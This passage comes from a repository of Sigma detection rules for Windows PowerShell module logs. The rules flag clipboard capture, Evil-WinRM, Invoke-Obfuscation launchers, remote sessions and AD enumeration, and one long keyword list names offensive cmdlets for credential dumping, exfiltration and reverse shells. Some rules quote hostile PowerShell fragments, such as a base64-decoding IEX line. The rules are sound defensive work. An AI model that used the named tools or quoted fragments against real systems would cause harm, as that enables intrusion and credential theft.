    "content": "title: PowerShell Get Clipboard\nid: 4cbd4f12-2e22-43e3-882f-bff3247ffb78\nstatus: test\ndescription: A General detection for the Get-Clipboard commands in PowerShell logs. This could be an adversary capturing clipboard contents.\nreferences:\n    - https://github.com/OTRF/detection-hackathon-apt29/issues/16\n    - https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/7.A.2_F4609F7E-C4DB-4327-91D4-59A58C962A02.md\nauthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)\ndate: 2020-05-02\nmodified: 2023-01-04\ntags:\n    - attack.collection\n    - attack.t1115\nlogsource:\n    product: windows\n    category: ps_module\n    definition: 0ad03ef1-f21b-4a79-8ce8-e6900c54b65b\ndetection:\n    selection:\n        Payload|contains: 'Get-Clipboard'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_module/posh_pm_hktl_evil_winrm_execution.yml",
    "content": "title: HackTool - Evil-WinRm Execution - PowerShell Module\nid: 9fe55ea2-4cd6-4491-8a54-dd6871651b51\nstatus: test\ndescription: |\n    Detects the execution of Evil-WinRM via PowerShell Module logs by leveraging the hardcoded strings inside the utility.\nreferences:\n    - https://github.com/Hackplayers/evil-winrm/blob/7514b055d67ec19836e95c05bd63e7cc47c4c2aa/evil-winrm.rb\n    - https://github.com/search?q=repo%3AHackplayers%2Fevil-winrm++shell.run%28&type=code\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2024-02-25\ntags:\n    - attack.lateral-movement\nlogsource:\n    product: windows\n    category: ps_module\ndetection:\n    selection_wsm:\n        ContextInfo|contains:\n            - ':\\Windows\\System32\\wsmprovhost.exe'\n            - ':\\Windows\\SysWOW64\\wsmprovhost.exe'\n    selection_payload_1:\n        Payload|contains:\n            - value=\"(get-location).path # https://github.com/Hackplayers/evil-winrm/blob/7514b055d67ec19836e95c05bd63e7cc47c4c2aa/evil-winrm.rb#L592\n            - value=\"(get-item*).length # https://github.com/Hackplayers/evil-winrm/blob/7514b055d67ec19836e95c05bd63e7cc47c4c2aa/evil-winrm.rb#L490\n            - 'Invoke-Binary ' # https://github.com/Hackplayers/evil-winrm/blob/7514b055d67ec19836e95c05bd63e7cc47c4c2aa/evil-winrm.rb#L740\n            - Donut-Loader -process_id*-donutfile # https://github.com/Hackplayers/evil-winrm/blob/7514b055d67ec19836e95c05bd63e7cc47c4c2aa/evil-winrm.rb#L761\n            - Bypass-4MSI\n            - IEX ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($a))).replace('???','')\n    selection_payload_2:\n        Payload|contains|all:\n            - $servicios = Get-ItemProperty \"registry::HKLM\\System\\CurrentControlSet\\Services\\\"\n            - Where-Object {$_.imagepath -notmatch \"system\" -and $_.imagepath -ne $null } | Select-Object pschildname,imagepath\n    selection_payload_3:\n        Payload|contains|all:\n            - $a +=  \\\"$($_.FullName.Replace('\\\\','/'))/\\\"}else{  $a += \\\"$($_.FullName.Replace('\\\\', '/'))\\\" } # https://github.com/Hackplayers/evil-winrm/blob/7514b055d67ec19836e95c05bd63e7cc47c4c2aa/evil-winrm.rb#L1001\n            - $a=@();$\n    condition: selection_wsm and 1 of selection_payload_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_clip.yml",
    "content": "title: Invoke-Obfuscation CLIP+ Launcher - PowerShell Module\nid: a136cde0-61ad-4a61-9b82-8dc490e60dd2\nrelated:\n    - id: 73e67340-0d25-11eb-adc1-0242ac120002\n      type: derived\nstatus: test\ndescription: Detects Obfuscated use of Clip.exe to execute PowerShell\nreferences:\n    - https://github.com/SigmaHQ/sigma/issues/1009  # (Task 26)\nauthor: Jonathan Cheong, oscd.community\ndate: 2020-10-13\nmodified: 2024-04-05\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_module\n    definition: 0ad03ef1-f21b-4a79-8ce8-e6900c54b65b\ndetection:\n    selection_4103:\n        Payload|re: 'cmd.{0,5}(?:/c|/r).+clip(?:\\.exe)?.{0,4}&&.+clipboard]::\\(\\s\\\\\"\\{\\d\\}.+-f.+\"'\n    condition: selection_4103\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_obfuscated_iex.yml",
    "content": "title: Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell Module\nid: 2f211361-7dce-442d-b78a-c04039677378\nrelated:\n    - id: 1b9dc62e-6e9e-42a3-8990-94d7a10007f7\n      type: derived\nstatus: test\ndescription: Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block cited in the reference section below\nreferences:\n    - https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888\nauthor: Daniel Bohannon (@Mandiant/@FireEye), oscd.community\ndate: 2019-11-08\nmodified: 2022-12-31\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_module\n    definition: 0ad03ef1-f21b-4a79-8ce8-e6900c54b65b\ndetection:\n    selection_payload:\n        - Payload|re: '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\['\n        - Payload|re: '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\['\n        - Payload|re: '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\['\n        - Payload|re: '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}'\n        - Payload|re: '\\*mdr\\*\\W\\s*\\)\\.Name'\n        - Payload|re: '\\$VerbosePreference\\.ToString\\('\n        - Payload|re: '\\[String\\]\\s*\\$VerbosePreference'\n    condition: selection_payload\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_stdin.yml",
    "content": "title: Invoke-Obfuscation STDIN+ Launcher - PowerShell Module\nid: 9ac8b09b-45de-4a07-9da1-0de8c09304a3\nrelated:\n    - id: 779c8c12-0eb1-11eb-adc1-0242ac120002\n      type: derived\nstatus: test\ndescription: Detects Obfuscated use of stdin to execute PowerShell\nreferences:\n    - https://github.com/SigmaHQ/sigma/issues/1009  # (Task 25)\nauthor: Jonathan Cheong, oscd.community\ndate: 2020-10-15\nmodified: 2024-04-05\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_module\n    definition: 0ad03ef1-f21b-4a79-8ce8-e6900c54b65b\ndetection:\n    selection_4103:\n        Payload|re: 'cmd.{0,5}(?:/c|/r).+powershell.+(?:\\$\\{?input\\}?|noexit).+\"'\n    condition: selection_4103\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_var.yml",
    "content": "title: Invoke-Obfuscation VAR+ Launcher - PowerShell Module\nid: 6bfb8fa7-b2e7-4f6c-8d9d-824e5d06ea9e\nrelated:\n    - id: 0adfbc14-0ed1-11eb-adc1-0242ac120002\n      type: derived\nstatus: test\ndescription: Detects Obfuscated use of Environment Variables to execute PowerShell\nreferences:\n    - https://github.com/SigmaHQ/sigma/issues/1009  # (Task 24)\nauthor: Jonathan Cheong, oscd.community\ndate: 2020-10-15\nmodified: 2024-04-05\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_module\n    definition: 0ad03ef1-f21b-4a79-8ce8-e6900c54b65b\ndetection:\n    selection_4103:\n        Payload|re: 'cmd.{0,5}(?:/c|/r)(?:\\s|)\"set\\s[a-zA-Z]{3,6}.*(?:\\{\\d\\}){1,}\\\\\"\\s+?-f(?:.*\\)){1,}.*\"'\n    condition: selection_4103\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_compress.yml",
    "content": "title: Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell Module\nid: 7034cbbb-cc55-4dc2-8dad-36c0b942e8f1\nrelated:\n    - id: 20e5497e-331c-4cd5-8d36-935f6e2a9a07\n      type: derived\nstatus: test\ndescription: Detects Obfuscated Powershell via COMPRESS OBFUSCATION\nreferences:\n    - https://github.com/SigmaHQ/sigma/issues/1009 # (Task 19)\nauthor: Timur Zinniatullin, oscd.community\ndate: 2020-10-18\nmodified: 2022-11-29\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_module\n    definition: 0ad03ef1-f21b-4a79-8ce8-e6900c54b65b\ndetection:\n    selection_4103:\n        Payload|contains|all:\n            - 'new-object'\n            - 'text.encoding]::ascii'\n        Payload|contains:\n            - 'system.io.compression.deflatestream'\n            - 'system.io.streamreader'\n        Payload|endswith: 'readtoend'\n    condition: selection_4103\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_rundll.yml",
    "content": "title: Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell Module\nid: a23791fe-8846-485a-b16b-ca691e1b03d4\nrelated:\n    - id: e6cb92b4-b470-4eb8-8a9d-d63e8583aae0\n      type: derived\nstatus: test\ndescription: Detects Obfuscated Powershell via RUNDLL LAUNCHER\nreferences:\n    - https://github.com/SigmaHQ/sigma/issues/1009 # (Task 23)\nauthor: Timur Zinniatullin, oscd.community\ndate: 2020-10-18\nmodified: 2022-11-29\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_module\n    definition: 0ad03ef1-f21b-4a79-8ce8-e6900c54b65b\ndetection:\n    selection_4103:\n        Payload|contains|all:\n            - 'rundll32.exe'\n            - 'shell32.dll'\n            - 'shellexec_rundll'\n            - 'powershell'\n    condition: selection_4103\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_stdin.yml",
    "content": "title: Invoke-Obfuscation Via Stdin - PowerShell Module\nid: c72aca44-8d52-45ad-8f81-f96c4d3c755e\nrelated:\n    - id: 86b896ba-ffa1-4fea-83e3-ee28a4c915c7\n      type: derived\nstatus: test\ndescription: Detects Obfuscated Powershell via Stdin in Scripts\nreferences:\n    - https://github.com/SigmaHQ/sigma/issues/1009  # (Task28)\nauthor: Nikita Nazarov, oscd.community\ndate: 2020-10-12\nmodified: 2024-04-05\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_module\n    definition: 0ad03ef1-f21b-4a79-8ce8-e6900c54b65b\ndetection:\n    selection_4103:\n        Payload|re: '(?i)(set).*&&\\s?set.*(environment|invoke|\\$?\\{?input).*&&.*\"'\n    condition: selection_4103\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_use_clip.yml",
    "content": "title: Invoke-Obfuscation Via Use Clip - PowerShell Module\nid: ebdf49d8-b89c-46c9-8fdf-2c308406f6bd\nrelated:\n    - id: db92dd33-a3ad-49cf-8c2c-608c3e30ace0\n      type: derived\nstatus: test\ndescription: Detects Obfuscated Powershell via use Clip.exe in Scripts\nreferences:\n    - https://github.com/SigmaHQ/sigma/issues/1009  # (Task29)\nauthor: Nikita Nazarov, oscd.community\ndate: 2020-10-09\nmodified: 2024-04-05\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_module\n    definition: 0ad03ef1-f21b-4a79-8ce8-e6900c54b65b\ndetection:\n    selection_4103:\n        Payload|re: '(?i)echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?)'\n    condition: selection_4103\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_use_mhsta.yml",
    "content": "title: Invoke-Obfuscation Via Use MSHTA - PowerShell Module\nid: 07ad2ea8-6a55-4ac6-bf3e-91b8e59676eb\nrelated:\n    - id: e55a5195-4724-480e-a77e-3ebe64bd3759\n      type: derived\nstatus: test\ndescription: Detects Obfuscated Powershell via use MSHTA in Scripts\nreferences:\n    - https://github.com/SigmaHQ/sigma/issues/1009 # (Task31)\nauthor: Nikita Nazarov, oscd.community\ndate: 2020-10-08\nmodified: 2023-01-04\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_module\n    definition: 0ad03ef1-f21b-4a79-8ce8-e6900c54b65b\ndetection:\n    selection:\n        Payload|contains|all:\n            - 'set'\n            - '&&'\n            - 'mshta'\n            - 'vbscript:createobject'\n            - '.run'\n            - '(window.close)'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_use_rundll32.yml",
    "content": "title: Invoke-Obfuscation Via Use Rundll32 - PowerShell Module\nid: 88a22f69-62f9-4b8a-aa00-6b0212f2f05a\nrelated:\n    - id: a5a30a6e-75ca-4233-8b8c-42e0f2037d3b\n      type: derived\nstatus: test\ndescription: Detects obfuscated PowerShell via use of Rundll32 in scripts\nreferences:\n    - https://github.com/SigmaHQ/sigma/issues/1009\nauthor: Nikita Nazarov, oscd.community\ndate: 2019-10-08\nmodified: 2022-11-29\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_module\n    definition: 0ad03ef1-f21b-4a79-8ce8-e6900c54b65b\ndetection:\n    selection_4103:\n        Payload|contains|all:\n            - '&&'\n            - 'rundll32'\n            - 'shell32.dll'\n            - 'shellexec_rundll'\n        Payload|contains:\n            - 'value'\n            - 'invoke'\n            - 'comspec'\n            - 'iex'\n    condition: selection_4103\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_var.yml",
    "content": "title: Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell Module\nid: f3c89218-8c3d-4ba9-9974-f1d8e6a1b4a6\nrelated:\n    - id: e54f5149-6ba3-49cf-b153-070d24679126\n      type: derived\nstatus: test\ndescription: Detects obfuscated PowerShell via the VAR++ LAUNCHER\nreferences:\n    - https://github.com/SigmaHQ/sigma/issues/1009 # (Task27)\nauthor: Timur Zinniatullin, oscd.community\ndate: 2020-10-13\nmodified: 2024-04-05\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_module\n    definition: 0ad03ef1-f21b-4a79-8ce8-e6900c54b65b\ndetection:\n    selection_4103:\n        Payload|re: '(?i)&&set.*(\\{\\d\\}){2,}\\\\\"\\s+?-f.*&&.*cmd.*/c' # FPs with |\\/r\n    condition: selection_4103\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_module/posh_pm_malicious_commandlets.yml",
    "content": "title: Malicious PowerShell Commandlets - PoshModule\nid: 7d0d0329-0ef1-4e84-a9f5-49500f9d7c6c\nrelated:\n    - id: 89819aa4-bbd6-46bc-88ec-c7f7fe30efa6\n      type: similar\n    - id: 02030f2f-6199-49ec-b258-ea71b07e03dc\n      type: similar\nstatus: test\ndescription: Detects Commandlet names from well-known PowerShell exploitation frameworks\nreferences:\n    - https://adsecurity.org/?p=2921\n    - https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries\n    - https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1\n    - https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1\n    - https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1\n    - https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1\n    - https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/ # Invoke-TotalExec\n    - https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/ # Invoke-TotalExec\n    - https://github.com/calebstewart/CVE-2021-1675 # Invoke-Nightmare\n    - https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1\n    - https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html\n    - https://github.com/HarmJ0y/DAMP\n    - https://github.com/samratashok/nishang\n    - https://github.com/DarkCoderSc/PowerRunAsSystem/\n    - https://github.com/besimorhino/powercat\n    - https://github.com/Kevin-Robertson/Powermad\n    - https://github.com/adrecon/ADRecon\n    - https://github.com/adrecon/AzureADRecon\n    - https://github.com/sadshade/veeam-creds/blob/6010eaf31ba41011b58d6af3950cffbf6f5cea32/Veeam-Get-Creds.ps1\n    - https://github.com/The-Viper-One/Invoke-PowerDPAPI/\n    - https://github.com/Arno0x/DNSExfiltrator/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-01-20\nmodified: 2025-12-10\ntags:\n    - attack.execution\n    - attack.discovery\n    - attack.t1482\n    - attack.t1087\n    - attack.t1087.001\n    - attack.t1087.002\n    - attack.t1069.001\n    - attack.t1069.002\n    - attack.t1069\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_module\n    definition: 0ad03ef1-f21b-4a79-8ce8-e6900c54b65b\ndetection:\n    selection:\n        Payload|contains:\n            # Note: Please ensure alphabetical order when adding new entries\n            - 'Add-Exfiltration'\n            - 'Add-Persistence'\n            - 'Add-RegBackdoor'\n            - 'Add-RemoteRegBackdoor'\n            - 'Add-ScrnSaveBackdoor'\n            - 'BadSuccessor'\n            - 'Check-VM'\n            - 'ConvertTo-Rc4ByteStream'\n            - 'Decrypt-Hash'\n            - 'Disable-ADIDNSNode'\n            - 'Disable-MachineAccount'\n            - 'Do-Exfiltration'\n            - 'Enable-ADIDNSNode'\n            - 'Enable-MachineAccount'\n            - 'Enabled-DuplicateToken'\n            - 'Exploit-Jboss'\n            - 'Export-ADR' # # ADRecon related cmdlets\n            - 'Export-ADRCSV' # # ADRecon related cmdlets\n            - 'Export-ADRExcel' # # ADRecon related cmdlets\n            - 'Export-ADRHTML' # # ADRecon related cmdlets\n            - 'Export-ADRJSON' # # ADRecon related cmdlets\n            - 'Export-ADRXML' # # ADRecon related cmdlets\n            - 'Find-Fruit'\n            - 'Find-GPOLocation'\n            - 'Find-TrustedDocuments'\n            - 'Get-ADIDNS' # Covers: Get-ADIDNSNodeAttribute, Get-ADIDNSNodeOwner, Get-ADIDNSNodeTombstoned, Get-ADIDNSPermission, Get-ADIDNSZone\n            - 'Get-ApplicationHost'\n            - 'Get-ChromeDump'\n            - 'Get-ClipboardContents'\n            - 'Get-FoxDump'\n            - 'Get-GPPPassword'\n            - 'Get-IndexedItem'\n            - 'Get-KerberosAESKey'\n            - 'Get-Keystrokes'\n            - 'Get-LSASecret'\n            - 'Get-MachineAccountAttribute'\n            - 'Get-MachineAccountCreator'\n            - 'Get-PassHashes'\n            - 'Get-RegAlwaysInstallElevated'\n            - 'Get-RegAutoLogon'\n            - 'Get-RemoteBootKey'\n            - 'Get-RemoteCachedCredential'\n            - 'Get-RemoteLocalAccountHash'\n            - 'Get-RemoteLSAKey'\n            - 'Get-RemoteMachineAccountHash'\n            - 'Get-RemoteNLKMKey'\n            - 'Get-RickAstley'\n            - 'Get-Screenshot'\n            - 'Get-SecurityPackages'\n            - 'Get-ServiceFilePermission'\n            - 'Get-ServicePermission'\n            - 'Get-ServiceUnquoted'\n            - 'Get-SiteListPassword'\n            - 'Get-System'\n            - 'Get-TimedScreenshot'\n            - 'Get-UnattendedInstallFile'\n            - 'Get-Unconstrained'\n            - 'Get-USBKeystrokes'\n            - 'Get-VaultCredential'\n            - 'Get-VulnAutoRun'\n            - 'Get-VulnSchTask'\n            - 'Grant-ADIDNSPermission'\n            - 'Gupt-Backdoor'\n            - 'HTTP-Login'\n            - 'Install-ServiceBinary'\n            - 'Install-SSP'\n            - 'Invoke-ACLScanner'\n            - 'Invoke-ADRecon' # # ADRecon related cmdlets\n            - 'Invoke-ADSBackdoor'\n            - 'Invoke-AgentSmith'\n            - 'Invoke-AllChecks'\n            - 'Invoke-ARPScan'\n            - 'Invoke-AzureHound'\n            - 'Invoke-BackdoorLNK'\n            - 'Invoke-BadPotato'\n            - 'Invoke-BetterSafetyKatz'\n            - 'Invoke-BypassUAC'\n            - 'Invoke-Carbuncle'\n            - 'Invoke-Certify'\n            - 'Invoke-ConPtyShell'\n            - 'Invoke-CredentialInjection'\n            - 'Invoke-DAFT'\n            - 'Invoke-DCSync'\n            - 'Invoke-DinvokeKatz'\n            - 'Invoke-DllInjection'\n            - 'Invoke-DNSUpdate'\n            - 'Invoke-DNSExfiltrator'\n            - 'Invoke-DomainPasswordSpray'\n            - 'Invoke-DowngradeAccount'\n            - 'Invoke-EgressCheck'\n            - 'Invoke-Eyewitness'\n            - 'Invoke-FakeLogonScreen'\n            - 'Invoke-Farmer'\n            - 'Invoke-Get-RBCD-Threaded'\n            - 'Invoke-Gopher'\n            - 'Invoke-Grouper' # Also Covers Invoke-GrouperX\n            - 'Invoke-HandleKatz'\n            - 'Invoke-ImpersonatedProcess'\n            - 'Invoke-ImpersonateSystem'\n            - 'Invoke-InteractiveSystemPowerShell'\n            - 'Invoke-Internalmonologue'\n            - 'Invoke-Inveigh'\n            - 'Invoke-InveighRelay'\n            - 'Invoke-KrbRelay'\n            - 'Invoke-LdapSignCheck'\n            - 'Invoke-Lockless'\n            - 'Invoke-MalSCCM'\n            - 'Invoke-Mimikatz'\n            - 'Invoke-Mimikittenz'\n            - 'Invoke-MITM6'\n            - 'Invoke-NanoDump'\n            - 'Invoke-NetRipper'\n            - 'Invoke-Nightmare'\n            - 'Invoke-NinjaCopy'\n            - 'Invoke-OfficeScrape'\n            - 'Invoke-OxidResolver'\n            - 'Invoke-P0wnedshell'\n            - 'Invoke-Paranoia'\n            - 'Invoke-PortScan'\n            - 'Invoke-PoshRatHttp' # Also Covers Invoke-PoshRatHttps\n            - 'Invoke-PostExfil'\n            - 'Invoke-PowerDump'\n            - 'Invoke-PowerDPAPI'\n            - 'Invoke-PowerShellTCP'\n            - 'Invoke-PowerShellWMI'\n            - 'Invoke-PPLDump'\n            - 'Invoke-PsExec'\n            - 'Invoke-PSInject'\n            - 'Invoke-PsUaCme'\n            - 'Invoke-ReflectivePEInjection'\n            - 'Invoke-ReverseDNSLookup'\n            - 'Invoke-Rubeus'\n            - 'Invoke-RunAs'\n            - 'Invoke-SafetyKatz'\n            - 'Invoke-SauronEye'\n            - 'Invoke-SCShell'\n            - 'Invoke-Seatbelt'\n            - 'Invoke-ServiceAbuse'\n            - 'Invoke-ShadowSpray'\n            - 'Invoke-Sharp' # Covers all \"Invoke-Sharp\" variants\n            - 'Invoke-Shellcode'\n            - 'Invoke-SMBScanner'\n            - 'Invoke-Snaffler'\n            - 'Invoke-Spoolsample'\n            - 'Invoke-SpraySinglePassword'\n            - 'Invoke-SSHCommand'\n            - 'Invoke-StandIn'\n            - 'Invoke-StickyNotesExtract'\n            - 'Invoke-SystemCommand'\n            - 'Invoke-Tasksbackdoor'\n            - 'Invoke-Tater'\n            - 'Invoke-Thunderfox'\n            - 'Invoke-ThunderStruck'\n            - 'Invoke-TokenManipulation'\n            - 'Invoke-Tokenvator'\n            - 'Invoke-TotalExec'\n            - 'Invoke-UrbanBishop'\n            - 'Invoke-UserHunter'\n            - 'Invoke-VoiceTroll'\n            - 'Invoke-Whisker'\n            - 'Invoke-WinEnum'\n            - 'Invoke-winPEAS'\n            - 'Invoke-WireTap'\n            - 'Invoke-WmiCommand'\n            - 'Invoke-WMIExec'\n            - 'Invoke-WScriptBypassUAC'\n            - 'Invoke-Zerologon'\n            - 'MailRaider'\n            - 'New-ADIDNSNode'\n            - 'New-DNSRecordArray'\n            - 'New-HoneyHash'\n            - 'New-InMemoryModule'\n            - 'New-MachineAccount'\n            - 'New-SOASerialNumberArray'\n            - 'Out-Minidump'\n            - 'Port-Scan'\n            - 'PowerBreach'\n            - 'powercat '\n            - 'PowerUp'\n            - 'PowerView'\n            - 'Remove-ADIDNSNode'\n            - 'Remove-MachineAccount'\n            - 'Remove-Update'\n            - 'Rename-ADIDNSNode'\n            - 'Revoke-ADIDNSPermission'\n            - 'Set-ADIDNSNode' # Covers: Set-ADIDNSNodeAttribute, Set-ADIDNSNodeOwner\n            - 'Set-MacAttribute'\n            - 'Set-MachineAccountAttribute'\n            - 'Set-Wallpaper'\n            - 'Show-TargetScreen'\n            - 'Start-CaptureServer'\n            - 'Start-Dnscat2'\n            - 'Start-WebcamRecorder'\n            - 'Veeam-Get-Creds'\n            - 'VolumeShadowCopyTools'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_module/posh_pm_remote_powershell_session.yml",
    "content": "title: Remote PowerShell Session (PS Module)\nid: 96b9f619-aa91-478f-bacb-c3e50f8df575\nstatus: test\ndescription: Detects remote PowerShell sessions\nreferences:\n    - https://threathunterplaybook.com/hunts/windows/190511-RemotePwshExecution/notebook.html\nauthor: Roberto Rodriguez @Cyb3rWard0g, Tim Shelton\ndate: 2019-08-10\nmodified: 2023-01-20\ntags:\n    - attack.execution\n    - attack.t1059.001\n    - attack.lateral-movement\n    - attack.t1021.006\nlogsource:\n    product: windows\n    category: ps_module\n    definition: 0ad03ef1-f21b-4a79-8ce8-e6900c54b65b\ndetection:\n    selection:\n        ContextInfo|contains|all:\n            - ' = ServerRemoteHost ' #  HostName: 'ServerRemoteHost'  french : Nom d’hôte =\n            - 'wsmprovhost.exe'      #  HostApplication|contains: 'wsmprovhost.exe' french  Application hôte =\n    filter_pwsh_archive:\n        ContextInfo|contains: '\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\Microsoft.PowerShell.Archive.psm1'\n    condition: selection and not 1 of filter_*\nfalsepositives:\n    - Legitimate use of remote PowerShell sessions\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_module/posh_pm_remotefxvgpudisablement_abuse.yml",
    "content": "title: Potential RemoteFXvGPUDisablement.EXE Abuse - PowerShell Module\nid: 38a7625e-b2cb-485d-b83d-aff137d859f4\nrelated:\n    - id: a6fc3c46-23b8-4996-9ea2-573f4c4d88c5 # ProcCreation\n      type: similar\n    - id: f65e22f9-819e-4f96-9c7b-498364ae7a25 # PS Classic\n      type: similar\n    - id: cacef8fc-9d3d-41f7-956d-455c6e881bc5 # PS ScriptBlock\n      type: similar\nstatus: test\ndescription: Detects PowerShell module creation where the module contents are set to \"function Get-VMRemoteFXPhysicalVideoAdapter\". This could be a sign of potential abuse of the \"RemoteFXvGPUDisablement.exe\" binary, which is known to be vulnerable to module load-order hijacking.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md\n    - https://github.com/redcanaryco/AtomicTestHarnesses/blob/7e1e4da116801e3d6fcc6bedb207064577e40572/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1\nauthor: Nasreddine Bencherchali (Nextron Systems), frack113\ndate: 2021-07-13\nmodified: 2023-05-09\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    product: windows\n    category: ps_module\n    definition: 0ad03ef1-f21b-4a79-8ce8-e6900c54b65b\ndetection:\n    selection:\n        Payload|contains: 'ModuleContents=function Get-VMRemoteFXPhysicalVideoAdapter {'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_module/posh_pm_susp_ad_group_reco.yml",
    "content": "title: AD Groups Or Users Enumeration Using PowerShell - PoshModule\nid: 815bfc17-7fc6-4908-a55e-2f37b98cedb4\nstatus: test\ndescription: |\n    Adversaries may attempt to find domain-level groups and permission settings.\n    The knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group.\n    Adversaries may use this information to determine which users have elevated permissions, such as domain administrators.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md\nauthor: frack113\ndate: 2021-12-15\nmodified: 2023-01-20\ntags:\n    - attack.discovery\n    - attack.t1069.001\nlogsource:\n    product: windows\n    category: ps_module\n    definition: 0ad03ef1-f21b-4a79-8ce8-e6900c54b65b\ndetection:\n    selection_ad_principal:\n        - Payload|contains: 'get-ADPrincipalGroupMembership'\n        - ContextInfo|contains: 'get-ADPrincipalGroupMembership'\n    selection_get_aduser:\n        - Payload|contains|all:\n              - get-aduser\n              - '-f '\n              - '-pr '\n              - 